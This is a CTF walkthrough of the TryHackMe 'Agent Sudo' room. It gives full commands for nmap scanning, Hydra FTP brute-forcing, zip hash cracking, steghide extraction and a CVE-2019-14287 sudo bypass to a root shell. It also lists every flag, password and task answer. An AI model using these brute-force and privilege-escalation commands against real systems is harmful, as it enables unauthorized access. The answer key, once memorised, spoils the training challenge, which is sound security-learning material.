Agent Sudo — Walkthrough-TryHackMe

Visit https://tryhackme.com/room/agentsudoctf and join the room.

VPN: 10.9.227.16

Attacker i/p: 10.10.25.88

This machine requires enumeration, hash cracking, steganography, and Privilege Escalation.

Enumerate

We Started with Nmap Scan to know the open ports.

nmap -sS -sV -A -O -Pn 10.10.25.88

21,22,80 are open ports running on the machine. A web server is running on port 80. Let’s open it and investigate further

10.10.25.88

So the codename is probably a single letter, based on the signature, Agent R. We are told to use this codename as the user-agent.

Since we don’t know the codename, I used Burp Suite’s Intruder to intercept and fuzz the correct user-agent, or you can use the curl.

From the results, we can see that letters R and C gave a different size response than other letters.

With User-agent: R, we have nothing interesting, just a warning that this incident will be reported.

With User-agent: C, we get redirected to /agent_C_attention.php, where we have a message:

Now we have a username, Chris, and it’s supposed to have a weak password, so now we can Bruteforce FTP with Hydra, using any of the below commands to resolve the password.

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.25.88 -V -I

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.25.88 ftp

Login: chris

Password: crystal

Now we know the password for the Agent, we can log in through FTP.

ftp 10.10.25.88

We have successfully logged in through FTP, and we checked for the content, and we got 3 files in images and a text file. We downloaded all the files using the “get command”.

Ok, let’s grab all the files to our local machine for further investigation:

ftp> mget *

Move on to the directory where we have the three files, and let’s take a look at the file type:

file *

cat To_agentJ.txt

By viewing the “To_agentJ.txt” file, the message was a login

The password for the chris is stored in the fake picture.

So we use “Steghide” to retrieve some hidden info and also checked by “ExifTool” for the “cutie.png” file, but nothing came up. Trying to unzip it with unzip cutie.png, we get an error message: skipping: To_agentR.txt need PK compat. v5.1 (can do v4.6)

I used 7zip: 7z x cutie.png to try and extract it, but we get a password prompt.

After we tried with “binwalk,” and we got a zip file inside the “cutie.png” file and extracted it from “cutie.png,” but it was encrypted.

binwalk cutie.png

binwalk cutie.png -e

With this, we get an extracted folder inside which we got zip file 8702.zip.

We can try to brute-force this with John the Ripper. First, we need to process the zip file into a format suitable for use with JtR. This can be done with zip2john.

We know that our zip is encrypted. That’s a bummer. But we can get the password by using zip2john and then use john to crack the hash

zip2john 8702.zip > Output.txt

john Output.txt

We got alien a password, so we tried to extract the zip file but unzip command didn’t work, so we used this command to use

7z e 8702.zip

and password as alien

cat To_agentR.txt

The text in quotes looks like what we want, but it looks like it is encoded. This message was from Agent R. We decoded this QXJlYTUx message using Cyberchef. Cyberchef suggests auto decoding. CyberChef works like magic and suggests auto decoding using Base64.

(or) you can use the below command to decode

echo -n ‘QXJlYTUx’ | base64 -d

Area51

Now we have Area51. The only file left seems to be our jpg image. steghide is often used to hide data inside of jpg files with a passphrase. Maybe that is why one of the questions ask us for the steg password.

We can verify if our jpg has something to hide, and indeed it does with password Area51

steghide info cute-alien.jpg

Using this password to extract data from cute-alien.jpg:

steghide — extract -sf cute-alien.jpg

cat message.txt

hackerrules!

User Flag & Privilege Escalation

Now we logged in through SSH into the machine using the username and password we found. Now we can read the user flag

ssh james@10.10.25.88

with password hackerrules!

Got the user flag

b03d975e8c92a7c04146cfa7a5a313c7

And the other is an image. We need to find out where the image is from. You can use the command below to download the image from the machine and do a reverse image search on Google

scp james@10.10.25.88:Alien_autospy.jpg /home/

Privilege escalation

We checked for the permission the user has with “sudo -l” command.

It looks like our user is not allowed to run /bin/bash as root since we have a ! root. However, this looks weird as the first all means our user can run /bin/bash as any user. This is interesting, perhaps we can find a way to exploit this.

As luck would have it, a google search returns us something we might be able to use to gain root privileges.

We searched on google, and we got a vulnerability for Sudo for version 1.8, so we checked the version of sudo.

sudo -V

According to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules and can cause incorrect logging by invoking sudo with a crafted user ID. For example, this allows bypass of! root configuration, and USER= logging, for a sudo -u \#$((0xffffffff)) command.

Our sudo version is lower than 1.8.28, so we can exploit the machine. Using the exploit we found, we can indeed spawn a root shell and get our root flag.

sudo -u#-1 /bin/bash

We are root now!

cd /root

ls

cat root.txt

b53a02f55b57d4439e3341834d70c062s

Done!!!!!! Let us see the answers to the challenge questions now.

Task 2 Enumerate

Enumerate the machine and get all the important information

Answer the questions below

How many open ports?

3

How you redirect yourself to a secret page?

User-agent

What is the agent name?

chris

Task 3 Hash cracking and brute-force

Done enumerate the machine? Time to brute your way out.

Answer the questions below

FTP password

crystal

Zip file password

alien

steg password

Area51

Who is the other agent (in full name)?

james

SSH password

hackerrules!

Task 4 Capture the user flag

You know the drill.

Answer the questions below

What is the user flag?

b03d975e8c92a7c04146cfa7a5a313c7

What is the incident of the photo called?

Roswell alien autopsy

Task 5 Privilege escalation

Enough with the extraordinary stuff? Time to get real.

Answer the questions below

CVE number for the escalation (Format: CVE-xxxx-xxxx)

CVE-2019–14287

What is the root flag?

b53a02f55b57d4439e3341834d70c062

(Bonus) Who is Agent R?

DesKel

Thank you very much for reading. As I always mention in every blog, suggestions are always welcome and open for discussion to discuss other methods to complete the same task. I hope you find this is useful, and if there is something you would like to add or any suggestions, you can contact me anytime..”